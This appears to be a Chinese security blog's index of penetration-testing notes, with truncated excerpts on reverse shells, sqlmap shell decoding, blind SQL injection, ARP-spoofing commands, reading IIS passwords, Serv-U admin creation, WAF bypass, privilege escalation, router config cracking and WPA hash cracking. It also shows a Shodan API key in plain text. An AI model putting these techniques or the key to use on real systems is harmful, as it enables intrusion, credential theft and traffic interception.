python 反弹shell

来源:https://github.com/dairoot/Shell-rebound/blob/master/back.py http://www.mksec.net/nc.py # -*- coding:utf-8 -*- #!/usr/bin/env python """ back connect py version,only lin...

sqlmap 的shell 、udf 解码

sqlmap 中 自带 的shell 以及一些 二进制 文件 不能直接使用的 因为防止被误杀 都经过异或 方式编码了的 所幸sqlmap 自带解码工具 目录 ./sqlmap/extra/cloak/cloak.py 如 lib_mysqludf_sys.dll (比较喜欢...

string hex 互转脚本

支持转换文件 及 字符串 <?php $options = getopt('d:e:x:'); if(empty($options)){ echo <<<EOT code by lostwolf :) Usage: $argv[0] -e encode [String or File] ...

二分法盲注实例

<?php //$sCharset = 'etaoinshrdlcumwfgypbvkjxqz@'; $sCharset ='ABCDEF0123456789'; /* for every character */ for ($i=0, $result=''; $i<32; ++$i) { $ch = $sCharset; ...

windows 下tcpdump+arpspoof arp嗅探

arp 欺骗 arpspoof.exe /l 列出网络接口 arpspoof.exe 192.168.3.1 192.168.3.5 80 0 1 嗅探: tcpdump -D //查看网络接口 tcpdump -i 3 -w h.cap -s 0 -s0 表示取消抓包长度限制 否则会导致...

windows 10 安装 Kautilya

1、Kautilya 使用 Ruby 编写,因此需要先安装 Ruby 运行环境。到这里下载安装 1.9.3 版(由于对 Win32Console 的依赖,不要安装2.0或以上版本)。 1.9.3 ruby 下载 http://rubyinstaller.org/downloads/archives...

使用rubyGems taobao镜像 windows

$ gem sources --add https://ruby.taobao.org/ --remove https://rubygems.org/ $ gem sources -l *** CURRENT SOURCES *** https://ruby.taobao.org # 请确保只有 ruby.taobao.org $ gem instal...

定时关机

@echo off mode con cols=40 lines=5 color f0 title 定时关机 :select echo 现在时间是 %time:~0,-3% echo 请输入关机时间 (时间段 00:00–23:59): SET /p shutdowntime= for /f "tokens=1,2 delim...

无线网卡共享WIFI的批处理

文章转载 来源不明。 看到大家都在买什么可以发射信号的无线网卡,其实只需要一个批处理就可以用一个无线网卡来共享WIFI,只要你电脑上有无线网卡就可以用,不轮什么芯片什么型号都可以用,本批处理只支持v...

POSIX字符集

[:space:]  所有空白字符(新行,空格,制表符)[\t\r\n\v\f] [:digit:]  数字 [:xdigit:] 任何一个十六进制数(即:0-9,a-f,A-F) [:punct:]  所有标点符号 [:alpha:]  所有的字母  包括汉字...

读取iis配置(包括密码)

某次遇到一星外虚拟主机 不支持aspx 但找到 可执行目录 用vbs 无法读取 iis 配置 随即从 aspxspy中抠出代码 修改了一下 编译成exe 成功读取。 [csharp] using System; using System.Management; using Sy...

利用 shodan api 快速获取ip相关信息

<?php date_default_timezone_set('PRC'); chk_system_info(); clear(0); echo PHP_EOL; $shodan = new WebAPI("XHHn3L6OC3viAWZQFF1Xas4U5NeUjH8T"); $argv = $_SERVER['argv']; $argc = ...

dz 一键导库脚本

参考文章:https://www.t00ls.net/viewthread.php?tid=26809&highlight=wget windows wget https://www.t00ls.net/thread-28139-1-1.html 特点: 1、不会出现乱码 2、无需作任何配置 3、数据量超过500w 自动...

扫webshell

随手修改了一个 @imspider 写的 https://www.t00ls.net/viewthread.php?tid=22557 原作者: imspider 可扫描 weevelyshell 生成 或加密的shell 欢迎修改 指正 <!DOCTYPE html> <html>...

serv-u 一些操作

添加ftp管理用户 function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){ $fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8); if (!$fp) { ...

sqlmap自动化tamper尝试绕过waf

来源:https://forum.90sec.org/forum.php?mod=viewthread&tid=9297 来源:https://github.com/xinghuacai/bypass_waf 原版kali下用的 修改为win下可用 import os import re import glob ...

本地提权工具箱

0x01 背景 在我们平时渗透的过程中经常会遇到需要提权的情况,本文将介绍一些方便大家在Windows和Linux进行提权的工具。 0x02 本地提权之Windows 本工具适合在任何Windows服务器上进行已知提权漏洞的检测以及...

Asp.Net 提权Exp查询工具

来源:http://z-cg.com/post/asp_net_exp_searcher.html 作者:zcgonvh 一个用于查询本机补丁与对应Exp的工具,支持列表导出,避免了systeminfo由于补丁过多而显示不全的问题。 核心代码其实只有一句WMI查询...

wmic 获取系统补丁

wmic qfe GET hotfixid > a.txt&(for %i in (KB3076321 KB3072604 KB3073094 KB3072000 KB3065718 KB3072631 KB3072620 KB3068457 KB3069392 KB3070102 KB3072630 KB3072633 KB3067505 KB3077657 KB952004...

php-curlmulti

https://github.com/ares333/php-curlmulti 每次100个任务 简单的例子: <?php set_time_limit(0); header("Content-type: text/html; charset=UTF-8"); include 'Core.php'; include...

hashcak 跑wpa 包脚本

来源:https://github.com/killswitch-GUI/PenTesting-Scripts/blob/master/HASHCAT.bat 帮助:https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 代码请根据实际情况作修改 @ ECHO off :begin ec...

中兴光猫 F460 V3.0破解

1.浏览器输入http://192.168.1.1/manager_dev_config_t.gch,打开网页后点击“导出配置”,导出配置文件config.bin。     2. 使用 offzip.exe -a config.bin . 0 解开 bin文件 offzip 下载地...

字典处理笔记(shell笔记)

首发:https://www.t00ls.net/thread-29906-1-1.html 扩展阅读: sed grep 正则 基础请参阅: http://vbird.dic.ksu.edu.tw/linux_basic/0330regularex_2.php 虽然win下也可以用 sed awk 等 但 还是建议li...